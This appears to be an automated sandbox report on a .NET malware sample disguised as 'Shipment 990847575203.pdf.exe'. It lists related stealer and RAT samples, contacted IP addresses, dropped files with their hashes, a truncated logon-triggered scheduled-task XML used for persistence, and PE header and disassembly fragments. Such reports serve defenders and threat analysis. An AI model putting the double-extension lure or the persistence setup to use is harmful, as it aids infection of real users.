                                                                                                                            Ti5nuRV7y4.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 119.18.54.39
                                                                                                                            m30zZYga23.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                            • 208.91.199.223
                                                                                                                            PO82200487.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                            • 199.79.62.115

                                                                                                                            JA3 Fingerprints

                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            54328bd36c14bd82ddaa0c04b25ed9adfile.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 172.67.177.134
                                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 172.67.177.134
                                                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • 172.67.177.134
                                                                                                                            77541373_BESOZT00_2024_99101234_1_4_1.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • 172.67.177.134
                                                                                                                            Bloxflip Predictor.exeGet hashmaliciousNjratBrowse
                                                                                                                            • 172.67.177.134
                                                                                                                            CVmkXJ7e0a.exeGet hashmaliciousSheetRatBrowse
                                                                                                                            • 172.67.177.134
                                                                                                                            Ziraat Bankasi Swift Mesaji.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • 172.67.177.134
                                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 172.67.177.134
                                                                                                                            Request for Quotations and specifications.pdf.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • 172.67.177.134
                                                                                                                            hesaphareketi-01.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                            • 172.67.177.134
                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0efile.exeGet hashmaliciousXWormBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            gjvU5KOFhX.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            svhost.vbsGet hashmaliciousUnknownBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            hvqc3lk7ly.exeGet hashmaliciousDiscord Token Stealer, DotStealerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            adv.ps1Get hashmaliciousLummaCBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            d2W4YpqsKg.lnkGet hashmaliciousLummaCBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            https://nam.dcv.ms/0CX72IqyxfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 149.154.167.220
                                                                                                                            https://go.eu.sparkpostmail1.com/f/a/IgPiUnQgGsgttR90IQc-hw~~/AAGCxAA~/RgRpOpvrP0QqaHR0cHM6Ly9tYXNzd29vZHBvbGlzaC5pbi93YXRlci9jb2xkL2luZGV4VwVzcGNldUIKZ1XrFlhnca8zKlISemFyZ2FyQGZhcmlkZWEuY29tWAQAAAAB#YmlsbC5ob2l0dEBwYXJ0bmVyc21ndS5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 149.154.167.220

                                                                                                                            Dropped Files

                                                                                                                            No context

                                                                                                                            Created / dropped Files

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FZcXKpA.exe.log

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\AppData\Roaming\FZcXKpA.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1216
                                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                            Malicious:false
                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Shipment 990847575203.pdf.exe.log

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\Shipment 990847575203.pdf.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1216
                                                                                                                            Entropy (8bit):5.34331486778365
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                                                            Malicious:true
                                                                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:data
                                                                                                                            Category:modified
                                                                                                                            Size (bytes):2232
                                                                                                                            Entropy (8bit):5.380134126512796
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:48:+WSU4xc4RTmaoUeW+gZ9tK8NPZHUxL7u1iMugeC/ZPUyus:+LHxcIalLgZ2KRHWLOug8s
                                                                                                                            MD5:237040D0D4DC4DA299B8838DD92E89BB
                                                                                                                            SHA1:7899A4051517B40A9D92301967AA5FE0E2C8339A
                                                                                                                            SHA-256:AD50548E9B2B4F234ECAA75A6694D331540EFC433CB392C65ED509084D640431
                                                                                                                            SHA-512:101A9725001A400F8F63EADF315F503D84F3CE001468F3CB0BB9BC1DF074A9C9C1D9AC814DAF941CCB3962ED0DDC448F0631CE5340E257E6E3396F6904D84B45
                                                                                                                            Malicious:false
                                                                                                                            Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.ConfigurationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.4.................%...K... ...........System.Xml..<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2vdtxqax.yf3.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3ihoqpt4.bci.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aiilwtzw.csc.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ibpgt0ua.skv.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j2ekkjtr.r52.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n4uz423r.qwy.psm1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sqto3w3s.kza.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uv5etlbn.zuu.ps1

                                                                                                                            Download File
                                                                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):60
                                                                                                                            Entropy (8bit):4.038920595031593
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                            Malicious:false
                                                                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp3382.tmp

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\AppData\Roaming\FZcXKpA.exe
                                                                                                                            File Type:XML 1.0 document, ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1594
                                                                                                                            Entropy (8bit):5.102543954957388
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLxxvn:cge7QYrFdOFzOzN33ODOiDdKrsuT7v
                                                                                                                            MD5:7BBD543C72679D7BFA194510F0063296
                                                                                                                            SHA1:4AD700FB88EFAD8B2E1F39BE1D4B9A63A7E1AD4E
                                                                                                                            SHA-256:0EF64E7F3C36200CE255C21AA94B7D70B3F45FE70437D5F3B061A311DBF549A0
                                                                                                                            SHA-512:2C867C1AA300A7FEC2DAB0E6FDDD501CA205DD694B76E1809A8EC39A2E2B84D0F09150F50416BD44D0AF527FA6826DF58C8021E230651A2716D0F84025056C08
                                                                                                                            Malicious:false
                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

                                                                                                                            C:\Users\user\AppData\Local\Temp\tmp56D.tmp

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\Shipment 990847575203.pdf.exe
                                                                                                                            File Type:XML 1.0 document, ASCII text
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):1594
                                                                                                                            Entropy (8bit):5.102543954957388
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLxxvn:cge7QYrFdOFzOzN33ODOiDdKrsuT7v
                                                                                                                            MD5:7BBD543C72679D7BFA194510F0063296
                                                                                                                            SHA1:4AD700FB88EFAD8B2E1F39BE1D4B9A63A7E1AD4E
                                                                                                                            SHA-256:0EF64E7F3C36200CE255C21AA94B7D70B3F45FE70437D5F3B061A311DBF549A0
                                                                                                                            SHA-512:2C867C1AA300A7FEC2DAB0E6FDDD501CA205DD694B76E1809A8EC39A2E2B84D0F09150F50416BD44D0AF527FA6826DF58C8021E230651A2716D0F84025056C08
                                                                                                                            Malicious:true
                                                                                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run

                                                                                                                            C:\Users\user\AppData\Roaming\FZcXKpA.exe

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\Shipment 990847575203.pdf.exe
                                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):827392
                                                                                                                            Entropy (8bit):7.714922075712128
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:12288:jIC25usx+XtVUW1r4s7yy8FqY4uszmSpx0DzibplrdV26XyGnP/Ge/A:gx82VPFqY4usn0DzIVNXygPea
                                                                                                                            MD5:8626A0C350243B5390ABF5DEE2A40641
                                                                                                                            SHA1:8337486FBBECE35E03456500B23C5044466419C7
                                                                                                                            SHA-256:D16A272916C70064157E0CEF6770FF47ED874369E4DB36AE0A569DD85357EFCA
                                                                                                                            SHA-512:5B91943DB6E0B79FB6F776E4EB1337A54295688C09168EAD60EAE238B2BE51CDB64CE3518643624D569163E4FEE8A8E9CD374E0EDDD59E13C13F523EAFEC793D
                                                                                                                            Malicious:true
                                                                                                                            Antivirus:
                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                            • Antivirus: ReversingLabs, Detection: 66%
                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>Mg..............0..~... ........... ........@.. ....................................@.....................................O.......<............................................................................ ............... ..H............text....}... ...~.................. ..`.rsrc...<...........................@..@.reloc..............................@..B........................H...........H............T...G..........................................R.(......(.....(....*N..(....s....o....&*N..(....s....o....&*N..(....s....o....&*..(....*z.,..{....,..{....o......( ...*.0...........s!...}.....s"...}.....s"...}.....s"...}.....s"...}.....s#...}.....s#...}.....{....o$....($....{.....o%....{....o&...."...Bs'...o(...&.{....o)....{......o*....{....o)....{......o*....{....o)....{......o*....{....o)....{......o*....{....o)....{......o*....{....o)....{......o*.

                                                                                                                            C:\Users\user\AppData\Roaming\FZcXKpA.exe:Zone.Identifier

                                                                                                                            Download File
                                                                                                                            Process:C:\Users\user\Desktop\Shipment 990847575203.pdf.exe
                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):26
                                                                                                                            Entropy (8bit):3.95006375643621
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:3:ggPYV:rPYV
                                                                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                            Malicious:true
                                                                                                                            Preview:[ZoneTransfer]....ZoneId=0

                                                                                                                            Static File Info

                                                                                                                            General

                                                                                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                            Entropy (8bit):7.714922075712128
                                                                                                                            TrID:
                                                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                            • Windows Screen Saver (13104/52) 0.07%
                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                            File name:Shipment 990847575203.pdf.exe
                                                                                                                            File size:827'392 bytes
                                                                                                                            MD5:8626a0c350243b5390abf5dee2a40641
                                                                                                                            SHA1:8337486fbbece35e03456500b23c5044466419c7
                                                                                                                            SHA256:d16a272916c70064157e0cef6770ff47ed874369e4db36ae0a569dd85357efca
                                                                                                                            SHA512:5b91943db6e0b79fb6f776e4eb1337a54295688c09168ead60eae238b2be51cdb64ce3518643624d569163e4fee8a8e9cd374e0eddd59e13c13f523eafec793d
                                                                                                                            SSDEEP:12288:jIC25usx+XtVUW1r4s7yy8FqY4uszmSpx0DzibplrdV26XyGnP/Ge/A:gx82VPFqY4usn0DzIVNXygPea
                                                                                                                            TLSH:4005F04532699907D6B687F00A31F1B81BFD6E99A902E3DB4EC66DDFB8E1F004950723
                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>Mg..............0..~... ........... ........@.. ....................................@................................

                                                                                                                            File Icon

                                                                                                                            Icon Hash:5ba4a66a2a263095

                                                                                                                            Static PE Info

                                                                                                                            General

                                                                                                                            Entrypoint:0x4c9d12
                                                                                                                            Entrypoint Section:.text
                                                                                                                            Digitally signed:false
                                                                                                                            Imagebase:0x400000
                                                                                                                            Subsystem:windows gui
                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                            Time Stamp:0x674D3EA7 [Mon Dec 2 04:59:19 2024 UTC]
                                                                                                                            TLS Callbacks:
                                                                                                                            CLR (.Net) Version:
                                                                                                                            OS Version Major:4
                                                                                                                            OS Version Minor:0
                                                                                                                            File Version Major:4
                                                                                                                            File Version Minor:0
                                                                                                                            Subsystem Version Major:4
                                                                                                                            Subsystem Version Minor:0
                                                                                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                            Entrypoint Preview

                                                                                                                            Instruction
                                                                                                                            jmp dword ptr [00402000h]
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
                                                                                                                            add byte ptr [eax], al
